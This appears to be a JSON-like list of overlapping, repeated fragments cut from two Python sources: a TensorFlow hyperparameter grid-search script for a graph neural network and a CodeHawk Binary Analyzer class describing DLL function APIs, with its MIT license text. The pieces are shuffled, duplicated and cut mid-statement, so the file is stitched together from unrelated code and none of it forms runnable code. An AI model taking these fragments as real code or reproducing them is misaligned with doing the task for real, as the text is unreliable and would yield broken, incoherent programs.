pandas as pd def summary_10fold_results(summary_dir): df = pd.read_csv(summary_dir+\"/per_epoch_stats.csv\") acc = np.array(df[\"val_accuracy\"]) print(\"Results\")", "pd def summary_10fold_results(summary_dir): df = pd.read_csv(summary_dir+\"/per_epoch_stats.csv\") acc = np.array(df[\"val_accuracy\"]) print(\"Results\") print(\"Mean Accuracy =", "an instance of the model you want model = invariant_basic(config, data) # create", "pandas as pd def summary_10fold_results(summary_dir): df = pd.read_csv(summary_dir+\"/per_epoch_stats.csv\") acc = np.array(df[\"val_accuracy\"]) print(\"Results\") print(\"Mean", "import Trainer from Utils.config import process_config from Utils.dirs import create_dirs from Utils import", "import process_config from Utils.dirs import create_dirs from Utils import doc_utils from Utils.utils import", "True sess = tf.Session(config=gpuconfig) # create an instance of the model you want", "the config path from the run arguments # then process the json configuration", "= config.summary_dir base_exp_name = config.exp_name # create the experiments dirs create_dirs([config.summary_dir, config.checkpoint_dir]) data", "config.architecture = a3d config.fc = fully config.exp_name = base_exp_name + \" lr={0}_a2d={1}_a3d =", "you want model = invariant_basic(config, data) # create trainer and pass all the", "os.environ[\"CUDA_VISIBLE_DEVICES\"] = config.gpu import tensorflow.compat.v1 as tf import numpy as np tf.set_random_seed(1) base_summary_folder", "trainers.trainer import Trainer from Utils.config import process_config from Utils.dirs import create_dirs from Utils", "dirs create_dirs([config.summary_dir, config.checkpoint_dir]) data = DataGenerator(config) for lr in [0.00008*(2**i) for i in", "fully gpuconfig = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False) gpuconfig.gpu_options.visible_device_list = config.gpus_list gpuconfig.gpu_options.allow_growth = True sess =", "data, config) # here you train your model acc, loss, _ = 
trainer.train()", "from Utils.dirs import create_dirs from Utils import doc_utils from Utils.utils import get_args from", "to it trainer = Trainer(sess, model, data, config) # here you train your", "{3}\".format(lr, a1d,a3d,fully) curr_dir = os.path.join(base_summary_folder, \"lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr, a1d, a3d, fully))", "DataGenerator(config) for lr in [0.00008*(2**i) for i in range(2,8)]: for a1d in [[5],[10]]:", "create_dirs from Utils import doc_utils from Utils.utils import get_args from data_loader import data_helper", "import invariant_basic from trainers.trainer import Trainer from Utils.config import process_config from Utils.dirs import", "base_exp_name + \" lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr, a1d,a3d,fully) curr_dir = os.path.join(base_summary_folder, \"lr={0}_a2d={1}_a3d", "= {2}_fc = {3}\".format(lr, a1d,a3d,fully) curr_dir = os.path.join(base_summary_folder, \"lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr,", "capture the config path from the run arguments # then process the json", "curr_dir create_dirs([curr_dir]) # create your data generator data.config.learning_rate=lr data.config.architecture2d = a1d data.config.architecture3d =", "data_helper as helper # capture the config path from the run arguments #", "create your data generator data.config.learning_rate=lr data.config.architecture2d = a1d data.config.architecture3d = a3d data.config.fc =", "of the model you want model = invariant_basic(config, data) # create trainer and", "inputs/configs/parameter_search_config.json') os.environ[\"CUDA_VISIBLE_DEVICES\"] = config.gpu import tensorflow.compat.v1 as tf import numpy as np tf.set_random_seed(1)", "a3d config.fc = fully config.exp_name = base_exp_name + \" lr={0}_a2d={1}_a3d = {2}_fc =", "config.summary_dir base_exp_name = config.exp_name # create the experiments dirs create_dirs([config.summary_dir, config.checkpoint_dir]) data =", "from the run arguments # then process the json configuration file config =", "the 
run arguments # then process the json configuration file config = process_config('/Users/jiahe/PycharmProjects/gnn", "for i in range(2,8)]: for a1d in [[5],[10]]: for a3d in [[5], [10],[15]]:", "the json configuration file config = process_config('/Users/jiahe/PycharmProjects/gnn multiple inputs/configs/parameter_search_config.json') os.environ[\"CUDA_VISIBLE_DEVICES\"] = config.gpu import", "in [0.00008*(2**i) for i in range(2,8)]: for a1d in [[5],[10]]: for a3d in", "[[5],[10]]: for a3d in [[5], [10],[15]]: for fully in [[50,50],[20,20]]: config.learning_rate = lr", "= fully config.exp_name = base_exp_name + \" lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr, a1d,a3d,fully)", "from Utils.config import process_config from Utils.dirs import create_dirs from Utils import doc_utils from", "gpuconfig.gpu_options.visible_device_list = config.gpus_list gpuconfig.gpu_options.allow_growth = True sess = tf.Session(config=gpuconfig) # create an instance", "create an instance of the model you want model = invariant_basic(config, data) #", "def summary_10fold_results(summary_dir): df = pd.read_csv(summary_dir+\"/per_epoch_stats.csv\") acc = np.array(df[\"val_accuracy\"]) print(\"Results\") print(\"Mean Accuracy = {0}\".format(np.mean(acc)))", "np tf.set_random_seed(1) base_summary_folder = config.summary_dir base_exp_name = config.exp_name # create the experiments dirs", "# capture the config path from the run arguments # then process the", "= os.path.join(base_summary_folder, \"lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr, a1d, a3d, fully)) config.summary_dir = curr_dir", "# here you train your model acc, loss, _ = trainer.train() sess.close() tf.reset_default_graph()", "numpy as np tf.set_random_seed(1) base_summary_folder = config.summary_dir base_exp_name = config.exp_name # create the", "Utils.dirs import create_dirs from Utils import doc_utils from Utils.utils import get_args from data_loader", "train your model acc, loss, _ = trainer.train() sess.close() 
tf.reset_default_graph() import pandas as", "get_args from data_loader import data_helper as helper # capture the config path from", "for lr in [0.00008*(2**i) for i in range(2,8)]: for a1d in [[5],[10]]: for", "# create trainer and pass all the previous components to it trainer =", "in [[50,50],[20,20]]: config.learning_rate = lr config.architecture2d = a1d config.architecture = a3d config.fc =", "[[5], [10],[15]]: for fully in [[50,50],[20,20]]: config.learning_rate = lr config.architecture2d = a1d config.architecture", "want model = invariant_basic(config, data) # create trainer and pass all the previous", "tf.ConfigProto(allow_soft_placement=True, log_device_placement=False) gpuconfig.gpu_options.visible_device_list = config.gpus_list gpuconfig.gpu_options.allow_growth = True sess = tf.Session(config=gpuconfig) # create", "as helper # capture the config path from the run arguments # then", "data_loader.data_generator import DataGenerator from models.invariant_basic import invariant_basic from trainers.trainer import Trainer from Utils.config", "the experiments dirs create_dirs([config.summary_dir, config.checkpoint_dir]) data = DataGenerator(config) for lr in [0.00008*(2**i) for", "model, data, config) # here you train your model acc, loss, _ =", "create the experiments dirs create_dirs([config.summary_dir, config.checkpoint_dir]) data = DataGenerator(config) for lr in [0.00008*(2**i)", "from data_loader.data_generator import DataGenerator from models.invariant_basic import invariant_basic from trainers.trainer import Trainer from", "create_dirs([curr_dir]) # create your data generator data.config.learning_rate=lr data.config.architecture2d = a1d data.config.architecture3d = a3d", "loss, _ = trainer.train() sess.close() tf.reset_default_graph() import pandas as pd def summary_10fold_results(summary_dir): df", "acc, loss, _ = trainer.train() sess.close() tf.reset_default_graph() import pandas as pd def summary_10fold_results(summary_dir):", "= config.exp_name # 
create the experiments dirs create_dirs([config.summary_dir, config.checkpoint_dir]) data = DataGenerator(config) for", "config.gpus_list gpuconfig.gpu_options.allow_growth = True sess = tf.Session(config=gpuconfig) # create an instance of the", "data.config.architecture3d = a3d data.config.fc = fully gpuconfig = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False) gpuconfig.gpu_options.visible_device_list = config.gpus_list", "= DataGenerator(config) for lr in [0.00008*(2**i) for i in range(2,8)]: for a1d in", "acc = np.array(df[\"val_accuracy\"]) print(\"Results\") print(\"Mean Accuracy = {0}\".format(np.mean(acc))) # print(\"Mean std = {0}\".format(np.std(acc)))", "in [[5],[10]]: for a3d in [[5], [10],[15]]: for fully in [[50,50],[20,20]]: config.learning_rate =", "from trainers.trainer import Trainer from Utils.config import process_config from Utils.dirs import create_dirs from", "# create your data generator data.config.learning_rate=lr data.config.architecture2d = a1d data.config.architecture3d = a3d data.config.fc", "= {2}_fc = {3}\".format(lr, a1d, a3d, fully)) config.summary_dir = curr_dir create_dirs([curr_dir]) # create", "lr config.architecture2d = a1d config.architecture = a3d config.fc = fully config.exp_name = base_exp_name", "= tf.ConfigProto(allow_soft_placement=True, log_device_placement=False) gpuconfig.gpu_options.visible_device_list = config.gpus_list gpuconfig.gpu_options.allow_growth = True sess = tf.Session(config=gpuconfig) #", "then process the json configuration file config = process_config('/Users/jiahe/PycharmProjects/gnn multiple inputs/configs/parameter_search_config.json') os.environ[\"CUDA_VISIBLE_DEVICES\"] =", "a1d, a3d, fully)) config.summary_dir = curr_dir create_dirs([curr_dir]) # create your data generator data.config.learning_rate=lr", "you train your model acc, loss, _ = trainer.train() sess.close() tf.reset_default_graph() import pandas", "for a1d in [[5],[10]]: for a3d in [[5], [10],[15]]: for fully in 
[[50,50],[20,20]]:", "your model acc, loss, _ = trainer.train() sess.close() tf.reset_default_graph() import pandas as pd", "= True sess = tf.Session(config=gpuconfig) # create an instance of the model you", "multiple inputs/configs/parameter_search_config.json') os.environ[\"CUDA_VISIBLE_DEVICES\"] = config.gpu import tensorflow.compat.v1 as tf import numpy as np", "{2}_fc = {3}\".format(lr, a1d, a3d, fully)) config.summary_dir = curr_dir create_dirs([curr_dir]) # create your", "config.summary_dir = curr_dir create_dirs([curr_dir]) # create your data generator data.config.learning_rate=lr data.config.architecture2d = a1d", "in [[5], [10],[15]]: for fully in [[50,50],[20,20]]: config.learning_rate = lr config.architecture2d = a1d", "# create an instance of the model you want model = invariant_basic(config, data)", "= np.array(df[\"val_accuracy\"]) print(\"Results\") print(\"Mean Accuracy = {0}\".format(np.mean(acc))) # print(\"Mean std = {0}\".format(np.std(acc))) return", "import doc_utils from Utils.utils import get_args from data_loader import data_helper as helper #", "a1d,a3d,fully) curr_dir = os.path.join(base_summary_folder, \"lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr, a1d, a3d, fully)) config.summary_dir", "os from data_loader.data_generator import DataGenerator from models.invariant_basic import invariant_basic from trainers.trainer import Trainer", "a1d data.config.architecture3d = a3d data.config.fc = fully gpuconfig = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False) gpuconfig.gpu_options.visible_device_list =", "= config.gpu import tensorflow.compat.v1 as tf import numpy as np tf.set_random_seed(1) base_summary_folder =", "invariant_basic(config, data) # create trainer and pass all the previous components to it", "\"lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr, a1d, a3d, fully)) config.summary_dir = curr_dir create_dirs([curr_dir]) #", "import data_helper as helper # capture the config path from the run arguments", "data 
generator data.config.learning_rate=lr data.config.architecture2d = a1d data.config.architecture3d = a3d data.config.fc = fully gpuconfig", "= fully gpuconfig = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False) gpuconfig.gpu_options.visible_device_list = config.gpus_list gpuconfig.gpu_options.allow_growth = True sess", "a3d in [[5], [10],[15]]: for fully in [[50,50],[20,20]]: config.learning_rate = lr config.architecture2d =", "data.config.architecture2d = a1d data.config.architecture3d = a3d data.config.fc = fully gpuconfig = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False)", "import os from data_loader.data_generator import DataGenerator from models.invariant_basic import invariant_basic from trainers.trainer import", "import DataGenerator from models.invariant_basic import invariant_basic from trainers.trainer import Trainer from Utils.config import", "i in range(2,8)]: for a1d in [[5],[10]]: for a3d in [[5], [10],[15]]: for", "curr_dir = os.path.join(base_summary_folder, \"lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr, a1d, a3d, fully)) config.summary_dir =", "= base_exp_name + \" lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr, a1d,a3d,fully) curr_dir = os.path.join(base_summary_folder,", "tf import numpy as np tf.set_random_seed(1) base_summary_folder = config.summary_dir base_exp_name = config.exp_name #", "Utils import doc_utils from Utils.utils import get_args from data_loader import data_helper as helper", "= invariant_basic(config, data) # create trainer and pass all the previous components to", "[[50,50],[20,20]]: config.learning_rate = lr config.architecture2d = a1d config.architecture = a3d config.fc = fully", "= a1d data.config.architecture3d = a3d data.config.fc = fully gpuconfig = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False) gpuconfig.gpu_options.visible_device_list", "process the json configuration file config = process_config('/Users/jiahe/PycharmProjects/gnn multiple 
inputs/configs/parameter_search_config.json') os.environ[\"CUDA_VISIBLE_DEVICES\"] = config.gpu", "= process_config('/Users/jiahe/PycharmProjects/gnn multiple inputs/configs/parameter_search_config.json') os.environ[\"CUDA_VISIBLE_DEVICES\"] = config.gpu import tensorflow.compat.v1 as tf import numpy", "= Trainer(sess, model, data, config) # here you train your model acc, loss,", "log_device_placement=False) gpuconfig.gpu_options.visible_device_list = config.gpus_list gpuconfig.gpu_options.allow_growth = True sess = tf.Session(config=gpuconfig) # create an", "gpuconfig = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False) gpuconfig.gpu_options.visible_device_list = config.gpus_list gpuconfig.gpu_options.allow_growth = True sess = tf.Session(config=gpuconfig)", "config path from the run arguments # then process the json configuration file" ]
[ "NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE", "publish, distribute, sublicense, and/or sell # copies of the Software, and to permit", "int(xnode.get('adj')) def get_parameters(self): return [ DllFunctionParameter(self,p) for p in self.xnode.findall('par') ] def get_stack_parameters(self):", "# Author: <NAME> # ------------------------------------------------------------------------------ # The MIT License (MIT) # # Copyright", "MIT License (MIT) # # Copyright (c) 2016-2020 Kestrel Technology LLC # #", "software and associated documentation files (the \"Software\"), to deal # in the Software", "copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED", "\"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT", "TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.", "WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT", "(MIT) # # Copyright (c) 2016-2020 Kestrel Technology LLC # # Permission is", "OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN", "CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE #", "portions of the Software. # # THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT", "IN THE # SOFTWARE. 
# ------------------------------------------------------------------------------ from chb.models.DllFunctionParameter import DllFunctionParameter class DllFunctionAPI(object): def", "do so, subject to the following conditions: # # The above copyright notice", "# Copyright (c) 2016-2020 Kestrel Technology LLC # # Permission is hereby granted,", "EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,", "get_parameters(self): return [ DllFunctionParameter(self,p) for p in self.xnode.findall('par') ] def get_stack_parameters(self): stackparams =", "------------------------------------------------------------------------------ from chb.models.DllFunctionParameter import DllFunctionParameter class DllFunctionAPI(object): def __init__(self,summary,xnode): self.summary = summary self.xnode", "Results # Author: <NAME> # ------------------------------------------------------------------------------ # The MIT License (MIT) # #", "and to permit persons to whom the Software is # furnished to do", "use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the", "the Software without restriction, including without limitation the rights # to use, copy,", "OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION", "ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN", "without restriction, including without limitation the rights # to use, copy, modify, merge,", "the following conditions: # # The above copyright notice and this permission notice", "THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR", "[ DllFunctionParameter(self,p) for p in self.xnode.findall('par') ] def get_stack_parameters(self): stackparams = [ p", "__init__(self,summary,xnode): self.summary = summary self.xnode = xnode def get_calling_convention(self): return xnode.get('cc') def get_adjustment(self):", "person obtaining a copy # of this software and associated documentation files (the", "LIMITED TO THE 
WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND", "OR OTHER DEALINGS IN THE # SOFTWARE. # ------------------------------------------------------------------------------ from chb.models.DllFunctionParameter import DllFunctionParameter", "# furnished to do so, subject to the following conditions: # # The", "the Software, and to permit persons to whom the Software is # furnished", "permit persons to whom the Software is # furnished to do so, subject", "rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #", "DEALINGS IN THE # SOFTWARE. # ------------------------------------------------------------------------------ from chb.models.DllFunctionParameter import DllFunctionParameter class DllFunctionAPI(object):", "def get_parameters(self): return [ DllFunctionParameter(self,p) for p in self.xnode.findall('par') ] def get_stack_parameters(self): stackparams", "Permission is hereby granted, free of charge, to any person obtaining a copy", "OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # ------------------------------------------------------------------------------ from", "[ p for p in self.get_parameters() if p.is_stack_parameter() ] return sorted(stackparams,key=lambda p:p.get_stack_nr()) def", "THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR", "A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE # AUTHORS OR", "SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #", "FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF", "in the Software without restriction, including without limitation the rights # to use,", "IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT", "EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,", "Software without restriction, including without limitation the rights # to use, copy, modify,", "Kestrel Technology LLC # # Permission is hereby granted, free of charge, to", "# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies", "merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to", "PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS", "OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING", "ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE", "copies of the Software, and to permit persons to whom the Software is", "# The above copyright notice and this permission notice shall be included in", "included in all # copies or substantial portions of the Software. 
# #", "return [ DllFunctionParameter(self,p) for p in self.xnode.findall('par') ] def get_stack_parameters(self): stackparams = [", "# ------------------------------------------------------------------------------ # Access to the CodeHawk Binary Analyzer Analysis Results # Author:", "# of this software and associated documentation files (the \"Software\"), to deal #", "------------------------------------------------------------------------------ # Access to the CodeHawk Binary Analyzer Analysis Results # Author: <NAME>", "to do so, subject to the following conditions: # # The above copyright", "OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR", "xnode def get_calling_convention(self): return xnode.get('cc') def get_adjustment(self): return int(xnode.get('adj')) def get_parameters(self): return [", "def get_calling_convention(self): return xnode.get('cc') def get_adjustment(self): return int(xnode.get('adj')) def get_parameters(self): return [ DllFunctionParameter(self,p)", "is hereby granted, free of charge, to any person obtaining a copy #", "above copyright notice and this permission notice shall be included in all #", "persons to whom the Software is # furnished to do so, subject to", "sell # copies of the Software, and to permit persons to whom the", "WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE.", "conditions: # # The above copyright notice and this permission notice shall be", "substantial portions of the Software. # # THE SOFTWARE IS PROVIDED \"AS IS\",", "INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A", "# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE", "AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR", "OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,", "self.xnode.findall('par') ] def get_stack_parameters(self): stackparams = [ p for p in self.get_parameters() if", "documentation files (the \"Software\"), to deal # in the Software without restriction, including", "xnode.get('cc') def get_adjustment(self): return int(xnode.get('adj')) def get_parameters(self): return [ DllFunctionParameter(self,p) for p in", "Author: <NAME> # ------------------------------------------------------------------------------ # The MIT License (MIT) # # Copyright (c)", "to permit persons to whom the Software is # furnished to do so,", "ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT,", "or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED \"AS", "get_stack_parameters(self): stackparams = [ p for p in self.get_parameters() if p.is_stack_parameter() ] return", "class DllFunctionAPI(object): def __init__(self,summary,xnode): self.summary = summary self.xnode = xnode def get_calling_convention(self): return", "chb.models.DllFunctionParameter import DllFunctionParameter class DllFunctionAPI(object): def __init__(self,summary,xnode): self.summary = summary self.xnode = xnode", "notice shall be included in all # copies or substantial portions of the", "restriction, including without limitation the rights # to use, copy, modify, merge, publish,", "DllFunctionParameter(self,p) for p in self.xnode.findall('par') ] def get_stack_parameters(self): stackparams = [ p for", "obtaining a copy # of this software and associated documentation files (the \"Software\"),", "of charge, to any person obtaining a copy # of this software and", "whom the Software is # furnished to do so, subject to the following", "p in self.xnode.findall('par') ] def get_stack_parameters(self): stackparams = [ p for p in", "CONTRACT, TORT OR OTHERWISE, ARISING FROM, 
# OUT OF OR IN CONNECTION WITH", "NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE", "FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS", "Binary Analyzer Analysis Results # Author: <NAME> # ------------------------------------------------------------------------------ # The MIT License", "# # Permission is hereby granted, free of charge, to any person obtaining", "MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL", "get_adjustment(self): return int(xnode.get('adj')) def get_parameters(self): return [ DllFunctionParameter(self,p) for p in self.xnode.findall('par') ]", "if p.is_stack_parameter() ] return sorted(stackparams,key=lambda p:p.get_stack_nr()) def get_stack_parameter_names(self): stackparams = self.get_stack_parameters() return [", "free of charge, to any person obtaining a copy # of this software", "= summary self.xnode = xnode def get_calling_convention(self): return xnode.get('cc') def get_adjustment(self): return int(xnode.get('adj'))", "return xnode.get('cc') def get_adjustment(self): return int(xnode.get('adj')) def get_parameters(self): return [ DllFunctionParameter(self,p) for p", "shall be included in all # copies or substantial portions of the Software.", "import DllFunctionParameter class DllFunctionAPI(object): def __init__(self,summary,xnode): self.summary = summary self.xnode = xnode def", "get_calling_convention(self): return xnode.get('cc') def get_adjustment(self): return int(xnode.get('adj')) def get_parameters(self): return [ DllFunctionParameter(self,p) for", "PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT", "copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software,", "The above copyright notice and this permission notice shall be included in all", "BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR", "and/or sell # copies of the Software, and to permit persons to whom", "so, subject to the following conditions: # # The above copyright notice and", "this permission notice shall be included in all # copies or substantial portions", "LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION", "p for p in self.get_parameters() if p.is_stack_parameter() ] return sorted(stackparams,key=lambda p:p.get_stack_nr()) def get_stack_parameter_names(self):", "License (MIT) # # Copyright (c) 2016-2020 Kestrel Technology LLC # # Permission", "FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE", "OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT", "without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense,", "# copies or substantial portions of the Software. # # THE SOFTWARE IS", "PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING", "# in the Software without restriction, including without limitation the rights # to", "is # furnished to do so, subject to the following conditions: # #", "files (the \"Software\"), to deal # in the Software without restriction, including without", "Software. # # THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY", "# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS", "# SOFTWARE. 
# ------------------------------------------------------------------------------ from chb.models.DllFunctionParameter import DllFunctionParameter class DllFunctionAPI(object): def __init__(self,summary,xnode): self.summary", "sorted(stackparams,key=lambda p:p.get_stack_nr()) def get_stack_parameter_names(self): stackparams = self.get_stack_parameters() return [ p.name for p in", "= [ p for p in self.get_parameters() if p.is_stack_parameter() ] return sorted(stackparams,key=lambda p:p.get_stack_nr())", "# ------------------------------------------------------------------------------ from chb.models.DllFunctionParameter import DllFunctionParameter class DllFunctionAPI(object): def __init__(self,summary,xnode): self.summary = summary", "copy # of this software and associated documentation files (the \"Software\"), to deal", "for p in self.get_parameters() if p.is_stack_parameter() ] return sorted(stackparams,key=lambda p:p.get_stack_nr()) def get_stack_parameter_names(self): stackparams", "# Access to the CodeHawk Binary Analyzer Analysis Results # Author: <NAME> #", "IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE", "for p in self.xnode.findall('par') ] def get_stack_parameters(self): stackparams = [ p for p", "def __init__(self,summary,xnode): self.summary = summary self.xnode = xnode def get_calling_convention(self): return xnode.get('cc') def", "to the following conditions: # # The above copyright notice and this permission", "TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE", "Access to the CodeHawk Binary Analyzer Analysis Results # Author: <NAME> # ------------------------------------------------------------------------------", "to deal # in the Software without restriction, including without limitation the rights", "the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell", "to any person obtaining a copy # of this software and associated documentation", "p in self.get_parameters() if 
p.is_stack_parameter() ] return sorted(stackparams,key=lambda p:p.get_stack_nr()) def get_stack_parameter_names(self): stackparams =", "# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS", "] return sorted(stackparams,key=lambda p:p.get_stack_nr()) def get_stack_parameter_names(self): stackparams = self.get_stack_parameters() return [ p.name for", "following conditions: # # The above copyright notice and this permission notice shall", "p:p.get_stack_nr()) def get_stack_parameter_names(self): stackparams = self.get_stack_parameters() return [ p.name for p in stackparams", "of the Software, and to permit persons to whom the Software is #", "in all # copies or substantial portions of the Software. # # THE", "the Software. # # THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF", "def get_stack_parameters(self): stackparams = [ p for p in self.get_parameters() if p.is_stack_parameter() ]", "THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. #", "p.is_stack_parameter() ] return sorted(stackparams,key=lambda p:p.get_stack_nr()) def get_stack_parameter_names(self): stackparams = self.get_stack_parameters() return [ p.name", "and associated documentation files (the \"Software\"), to deal # in the Software without", "OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #", "DllFunctionAPI(object): def __init__(self,summary,xnode): self.summary = summary self.xnode = xnode def get_calling_convention(self): return xnode.get('cc')", "any person obtaining a copy # of this software and associated documentation files", "THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN", "# # The above copyright notice and this permission notice shall be included", "IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR", "2016-2020 Kestrel Technology LLC # # Permission is hereby granted, free of charge,", "\"Software\"), to deal # in the Software without restriction, including without limitation the", "OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE", "from chb.models.DllFunctionParameter import DllFunctionParameter class DllFunctionAPI(object): def __init__(self,summary,xnode): self.summary = summary self.xnode =", "LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #", "FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #", "SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES", "stackparams = [ p for p in self.get_parameters() if p.is_stack_parameter() ] return sorted(stackparams,key=lambda", "def get_stack_parameter_names(self): stackparams = self.get_stack_parameters() return [ p.name for p in stackparams ]", "BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN", "AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE", "IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED,", "sublicense, and/or sell # copies of the Software, and to permit persons to", "a copy # of this software and associated documentation files (the \"Software\"), to", "deal # in the Software without restriction, including without limitation the rights #", "Software is # furnished to do so, subject to the following conditions: #", "# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR", "Software, and to permit persons to whom the Software is # furnished to", "OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER", "The MIT License (MIT) # # Copyright (c) 2016-2020 Kestrel Technology LLC #", "CodeHawk Binary Analyzer Analysis Results # Author: <NAME> # ------------------------------------------------------------------------------ # The MIT", "LLC # # Permission is hereby granted, free of charge, to any person", "Analysis Results # Author: <NAME> # ------------------------------------------------------------------------------ # The MIT License (MIT) #", "including without limitation the rights # to use, copy, modify, merge, publish, distribute,", "HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN", "CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT", "OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE", "return sorted(stackparams,key=lambda p:p.get_stack_nr()) def get_stack_parameter_names(self): stackparams = self.get_stack_parameters() return [ p.name for p", "all # copies or substantial portions of the Software. 
